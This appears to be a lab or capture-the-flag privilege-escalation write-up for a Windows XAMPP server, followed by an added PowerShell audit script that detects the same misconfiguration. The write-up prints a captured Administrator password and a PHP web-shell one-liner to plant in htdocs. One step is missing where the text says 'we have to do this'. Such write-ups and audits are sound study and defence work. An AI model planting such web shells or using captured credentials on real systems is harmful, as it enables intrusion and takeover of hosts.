PrivEsc

The info says there are two ways to privesc.

Keylogger

Running msfconsole, getting a shell and listening to keystrokes exposes the Administrator credentials.

Administrator:Th3B3stH0sp1t4l9786!

XAMPP Misconfiguration

We know port 443 is open and running on a Windows XAMPP server. If we put a shell inside the root folder C:\xampp\htdocs, it will run as NT AUTHORITY\SYSTEM.

So I did

echo '<?php system($_GET["cmd"]) ?>' > shell.php

It won't run. Interestingly, it has to be the right encoding.

So instead we have to do this:

Now it works
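
A defender-side check for the XAMPP misconfiguration described above, as an added example that is not part of the original writeup: it lists services started from the XAMPP tree that run as LocalSystem, and ACL entries that let other principals write to htdocs. The C:\xampp path comes from the page; the trusted-principal list and the variable names are assumptions.

```powershell
# Added audit example. Assumption: XAMPP is installed at C:\xampp (path from the page).
$xamppRoot = 'C:\xampp'
$webRoot   = Join-Path $xamppRoot 'htdocs'

# Principals expected to have write access (assumed list, English names;
# adjust for localized systems and for your own admin groups).
$trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
           'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'

# 1. Services started from the XAMPP tree that run as LocalSystem.
$systemServices = Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -like "*$xamppRoot*" -and $_.StartName -eq 'LocalSystem' }

# 2. Allow ACEs on the web root that grant file creation/write to other principals.
#    WriteData (0x2) is contained in Write, Modify and FullControl; the generic
#    bits cover ACEs that Get-Acl reports as raw GENERIC_WRITE / GENERIC_ALL values.
$writeMask  = 0x2 -bor 0x40000000 -bor 0x10000000
$writableBy = (Get-Acl -Path $webRoot).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ([int]$_.FileSystemRights -band $writeMask) -and
        ($trusted -notcontains $_.IdentityReference.Value)
    }

# 3. Report. Both findings together are the condition described above:
#    anything a low-privileged user drops in htdocs is executed as SYSTEM.
$systemServices | Select-Object Name, StartName, PathName | Format-Table -AutoSize
$writableBy | Select-Object IdentityReference, FileSystemRights, IsInherited |
    Format-Table -AutoSize

if ($systemServices -and $writableBy) {
    Write-Warning "$webRoot is writable by non-admin principals and is served by a LocalSystem service."
}
```

The script only covers Apache installed as a Windows service; a server started interactively from an elevated session has to be checked by looking at the owner of the running process instead.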
